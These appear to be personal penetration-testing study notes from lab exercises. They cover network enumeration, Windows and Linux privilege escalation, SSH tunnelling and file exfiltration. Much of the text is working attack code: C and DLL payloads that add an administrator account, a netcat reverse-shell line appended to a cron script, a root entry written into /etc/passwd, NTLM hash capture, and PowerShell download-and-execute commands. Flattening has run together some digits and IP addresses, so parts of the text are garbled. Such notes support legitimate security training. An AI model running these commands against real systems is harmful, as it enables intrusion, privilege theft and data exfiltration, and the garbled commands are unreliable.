// Whois whois megacorpone.com -h 192.168.50.251 whois 38.100.193.70 -h 192.168.50.251 #reverse lookup // Google Hacking site:megacorpone.com // Github Search Gitleaks, Gitrob // Shodan hostname:megacorpone.com // SSL/TLS Headers Disabling the TLS_DHE_RSA_WITH_AES_256_CBC_SHA suite has been recommended for several years
Actively Gather
DNS Enumeration
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
// DNS Enumeration - linux NS, A, AAAA, MX, PTR, CNAME, TXT host www.megacorpone.com host -t mx megacorpone.com // DNS Enumeration in batches //domain sudo apt install seclists for ip in $(cat list.txt); do host $ip.megacorpone.com; done //reverse lookup(if PTR) for ip in $(seq 200254); do host 51.222.169.$ip; done | grep -v "not found" //tools dnsrecon -d megacorpone.com -t std // std=standard type dnsrecon -d megacorpone.com -D ~/list.txt -t brt //subdomain dnsenum megacorpone.com// forward+reverse lookups // DNS Enumeration - Windows
for server in $(cat smtpmachines); do echo "******************" $server "*****************"; smtp-user-enum -M VRFY -U userlist.txt -t $server;done #for multiple servers
**Windows**
Test-NetConnection -Port25192.168.50.8
dism /online /Enable-Feature /FeatureName:TelnetClient// download c:\windows\system32\telnet.exe// grab from other machines telnet 192.168.50.825 VRFY goofy
SNMP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
sudo nmap -sU --open -p 161192.168.50.1-254 -oG open-snmp.txt //probe echo public > community echo private >> community echo manager >> community for ip in $(seq 1254); do echo 192.168.50.$ip; done > ips onesixtyone -c community -i ips //query MIB snmpwalk -c public -v1 -t 10192.168.50.151 (-Oa hex->string) //enumerate windows users on the dc snmpwalk -c public -v1 192.168.50.1511.3.6.1.4.1.77.1.2.25 //enumerate current running processes snmpwalk -c public -v1 192.168.50.1511.3.6.1.2.1.25.4.2.1.2 //enumerate all installed software snmpwalk -c public -v1 192.168.50.1511.3.6.1.2.1.25.6.3.1.2 //enumerate all the current TCP listening ports snmpwalk -c public -v1 192.168.50.1511.3.6.1.2.1.6.13.1.3
HTTP
1
gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5
misc
1 2 3 4 5 6 7 8 9
//kali RDP xfreerdp /u:student /p:lab /v:192.168.240.152 /dynamic-resolution // Domain net time /domain ipconfig /all systeminfo
// get a interactive shell by pty before ssh python3 -c 'import pty; pty.spawn("/bin/bash")'
# HashCapture - Net-NTLMv2 (unprivileged) // set up a smb server to capture the hash in the request sent from victims net user paul sudo responder -I tun0 dir \\192.168.119.2\test hashcat --help | grep -i "ntlm" hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force // try the login form by UNC in the web applications Content-Disposition: form-data; name="myFile"; filename="\\\\192.168.45.204\\test"
// WinRM or RDP to access the system if the user is a member of the corresponding groups // if the target user has the Log on as a batch job access right -> schedule task to execute programs as the target user // If the target user has an active session -> psexec to execute command as the user // If having GUI, use Runas in powershell to start cmd as the user of which we have credential runas /user:backupadmin cmd
# InformationGathering through logs // PowerShell Transcription and PowerShell Script Block Logging. Get-History (Get-PSReadlineOption).HistorySavePath //Sometimes creating a remote PowerShell session via WinRM in a bind shell can cause unexpected bahavior, so we use evil-winrm evil-winrm -i target -u daveadmin -p "qwertqwertqwert123\!\!"
//snap-in services.msc, the Get-Service Cmdlet, or the Get-CimInstance Cmdlet (superseding Get-WmiObject) to list services on the machine Get-CimInstance -ClassName win32_service | SelectName,State,PathName | Where-Object {$_.State -like 'Running'} //choose between the traditional `icacls` Windows utility or the PowerShell Cmdlet `Get-ACL` to query the permissions MASKPERMISSIONS F Full access M Modify access RXRead and execute access R Read-only access W Write-only access > icacls "C:\xampp\mysql\bin\mysqld.exe" // when F permission, we can replace binary with a evil one #include <stdlib.h>
int main () { int i; i = system ("net user dave2 password123! /add"); i = system ("net localgroup administrators dave2 /add"); return0; } kali > x86_64-w64-mingw32-gcc adduser.c -o adduser.exe win > iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe win > move C:\xampp\mysql\bin\mysqld.exe mysqld.exe win > move .\adduser.exeC:\xampp\mysql\bin\mysqld.exe win > net stop mysql // no permission // check Startup Type of the service win > Get-CimInstance -ClassName win32_service | SelectName, StartMode | Where-Object {$_.Name -like 'mysql'} // Should have SeShutDownPrivilege to reboot (disabled mean nnothing) win > whoami /priv win > shutdown /r /t 0 win > Get-LocalGroupMember administrators
Automated tool to get all modifiable services and replace binary with bad ones
1 2 3 4 5 6 7 8 9
kali > cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 . kali > python3 -m http.server80 win > iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 win > powershell -ep bypass win > . .\PowerUp.ps1 // list modifiable services win > Get-ModifiableServiceFile // replace binary and restart it - default behavior is to create user `john` with the password `Password123!`, and add it to the local Administrators group win > Install-ServiceBinary -Name'mysql'
/* when DLL missed in an application and safe DLL search mode is disabled, we can put malicious DLL at the current directory General DDL loading order: 1. The directory from which the application loaded. 2. The system directory. 3. The 16-bit system directory. 4. The Windows directory. 5. The current directory. 6. The directories that are listed in the PATH environment variable. */ Get-CimInstance -ClassName win32_service | SelectName,State,PathName | Where-Object {$_.State -like 'Running'} // if we don't have permission to replace the binary, we can try DLL Hijacking > icacls .\Documents\BetaServ.exe note: if limited permission, copy the binary to local machine to analyze > C:\tools\Procmon\Procmon64.exe note: create a filter by Filter menu > Filter... -> process name is XXX > Restart-ServiceBetaServiceOR execute the binary on the local environment > $env:path //malicious ddl #include <stdlib.h> #include <windows.h>
BOOLAPIENTRYDllMain( HANDLE hModule,// Handle to DLL module DWORD ul_reason_for_call,// Reason for calling function LPVOID lpReserved ) // Reserved { switch ( ul_reason_for_call ) { caseDLL_PROCESS_ATTACH: // A process is loading the DLL. int i; i = system ("net user dave2 password123! /add"); i = system ("net localgroup administrators dave2 /add"); break; caseDLL_THREAD_ATTACH: // A process is creating a new thread. break; caseDLL_THREAD_DETACH: // A thread exits normally. break; caseDLL_PROCESS_DETACH: // A process unloads the DLL. break; } returnTRUE; } kali > x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll win > iwr -uri http://kali/myDLL.dll -Outfile myDLL.dll win > Restart-ServiceBetaService win > net user / net localgroup administrators
/* how Windows will try to locate the correct path of an unquoted service C:\Program.exe C:\Program Files\My.exe C:\Program Files\My Program\My.exe C:\Program Files\My Program\My service\service.exe */ // filter services with unquoted service path // option1 > Get-CimInstance -ClassName win32_service | SelectName,State,PathName // option2 > wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """ // check if user has the permission to start or top a service > Start-Service GammaService > Stop-Service GammaService // check if the user has the `W` access rights > icacls "C:\ProgramFiles" > icacls "C:\ProgramFiles\EnterpriseApps" // same as the rest of the processes in the chapter of "ServiceBinaryHijacking" > iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe > copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe' > Start-Service GammaService (although errors may be reported, still can work) // Automated tool to conduct unquoted service paths attack, creating a user john@Password123! > iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 > powershell -ep bypass > . .\PowerUp.ps1 > Get-UnquotedService > Write-ServiceBinary -Name 'GammaService' -Path "C:\ProgramFiles\EnterpriseApps\Current.exe" (target vulnerable location) > Restart-Service GammaService > net user / net localgroup Administrators
Scheduled Tasks
1 2 3 4 5 6 7 8 9
// ScheduledTask1 Cmdlet or the command schtasks /query
> schtasks /query /fo LIST /v > icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe > iwr -Urihttp://kali/adduser.exe -Outfile BackendCacheCleanup.exe > move .\Pictures\BackendCacheCleanup.exeBackendCacheCleanup.exe.bak > move .\BackendCacheCleanup.exe .\Pictures\ > net user / net localgroup administrators
Using Exploits
1 2 3 4 5 6 7 8 9 10 11 12 13 14
- Exploit programs' vulnerabilities with high permission running in the system - Exploit vulnerabilities existing in the Windows kernel. - Leverage Non-privileged users with assigned privileges (SelmperonatePrivilege) (RPC, named pipes) // Other privileges that may lead to privilege escalation are SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and SeDebug. // IIS server normally has SeImpersonatePrivilege. We can use printspoofer to exploit it. // Other tools: RottenPotato, SweetPotato, or JuicyPotato win > whoami /priv kali > wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe kali > python3 -m http.server 80 win > powershell win > iwr -uri http://kali/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe win > .\PrintSpoofer64.exe -i -c powershell.exe win > whoami
ip a // display networ k routing tables routel | route // list all connections ss -anp // firewall rules (also `iptables-save` ) cat /etc/iptables/rules.v4 // list cron jobs' subdirectory ls -lah /etc/cron* // list current user's scheduled jobs crontab -l sudo crontab -l (regular user has permission to sudo list cron jobs) grep "CRON" /var/log/syslog // for cron jobs log echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh // list applications dpkg -l // list all writable directories find / -writable -type d 2>/dev/null // check the existence of unmounted drives cat /etc/fstab mount // list all available disks lsblk // list loaded kernel modules (search exploit) lsmod // detailed kernel module info /sbin/modinfo libata(certain module_name) // SetUID, SetGID (GTFOBins) find / -perm -u=s -type f 2>/dev/null // if `find` has SetUID find /home/joe/Desktop -exec "/usr/bin/bash" -p \; // linux capabilities (GTFOBins) /usr/sbin/getcap -r / 2>/dev/null perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' (https://gtfobins.github.io/) // environment variables env cat .bashrc // verify if running as a privileged user (GTFOBins) sudo -l (GTFOBins) sudo -i cat /var/log/syslog | grep tcpdump // AppArmor defender
// inspecting service footprints watch -n 1"ps -aux | grep pass" // capture traffic sudo tcpdump -i lo -A | grep "pass"
// if /etc/passwd writable openssl passwd w00t echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd su root2 //with password w00t id
//automated tools ./unix-privesc-check standard > output.txt LinEnum linux-exploit-suggester
Port Redirection and SSH Tunneling
Linux Port Forwarding
1 2 3 4 5 6 7 8 9
// Port Forwarding victim > socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 kali > psql -h 192.168.50.63 -p 2345 -U postgres > \l > \c confluence > select * from cwd_user; ////{PKCS5S2}skupO/gzzNBHhLkzH3cejQRQSP9vY4PJNT6DrjBYBs23VRAq4F5N85OAAdCv8S34 kali > hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt
Linux SSH Tunneling
SSH Local Port Forwarding
1 2
// SSH Local Port Forwarding ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215 (-v)
SSH Dynamic Port Forwarding
1 2 3 4 5 6 7 8 9
// SSH Dynamic Port Forwarding python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215 tail /etc/proxychains4.conf [ProxyList] socks5 192.168.50.639999 proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234 // Lowering the tcp_read_time_out and tcp_connect_time_out values in the Proxychains configuration proxychains nmap -vvv -sT --top-ports=20 -Pn172.16.50.217
SSH Remote Port Forwarding
1 2 3 4 5 6 7 8 9 10 11 12
// kali ssh server, stet up a listening tcp port on kali; // victim ssh client, ssh to kai // All the traffic is pushed by Kali toward the ssh client // ssh client forwards all the traffic from the ssh server to any target as long as it configured // PasswordAuthentication to yes in /etc/ssh/sshd_config kali> sudo systemctl start ssh kali> sudo ss -ntplu victim > python3 -c 'import pty; pty.spawn("/bin/bash")' // -R kaliIP:port victim > ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4 kali > psql -h 127.0.0.1 -p 2345 -U postgres > \l
SSH Remote Dynamic Port Forwarding
1 2 3 4 5 6 7 8 9
// only the OpenSSH client needs to be version 7.6 or above to use it - the server version doesn't matter kali> sudo systemctl start ssh kali> sudo ss -ntplu victim > python3 -c 'import pty; pty.spawn("/bin/bash")' victim > ssh -N -R 9998 kali@192.168.118.4 kali > vim /etc/proxychains4.conf [ProxyList] socks5 127.0.0.19998 proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64
Using sshuttle
1 2 3
victim > socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22 kali > sshuttle -r database_admin@192.168.50.63:222210.4.50.0/24172.16.50.0/24 kali > smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
Port Forwarding with Windows Tools
SSH
1 2 3 4 5 6 7 8 9 10 11 12
// Since version 1803 (April 2018 Update), ssh- utilities are bundled with Windows in %systemdrive%\Windows\System32\OpenSSH
// Remote dynamic port forward (OpenSSH > 7.6) kali > sudo systemctl start ssh win > where ssh win > ssh -N -R 9998 kali@192.168.118.4 kali > ss -ntplu kali > vim /etc/proxychains4.conf [ProxyList] socks5 127.0.0.19998 kali > proxychains psql -h 10.4.50.215 -U postgres > \l
Plink
1 2 3 4 5 6
// PuTTY kali > sudo systemctl start apache2 kali > find / -name plink.exe2>/dev/null kali > sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/ windows > powershell wget -Urihttp://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe
/// 1 Python -m pyftpdlib -w Windowsmachine: ftp Open <LinuxIP> <Port> User: anonymous Password: anonymous Put <windows_file>
/// 2 Start an impacket smb server on kali with smb2 support flag. On windows victim power shell: copy-item <target file> \\<kali ip>\<share name>\<destination file name>
impacket-smbserver test . -smb2support -username kourosh -password kourosh //option 1 on windows copy-item .\Database.kdbx \\192.168.45.204\test\Database.kdbx //option2 on windows net use m: \\Kali_IP\test /user:kourosh kourosh copy mimikatz.logm:\
/// 4 Using powercat + powershell. Host powercat.ps1(link: https://github.com/besimorhino/powercat/blob/master/powercat.ps1) in a webserver on the attacker machine. Execute powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://kali-ip/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoTransfer" On kali: wget http://windows-ip:4444/FileToTransfer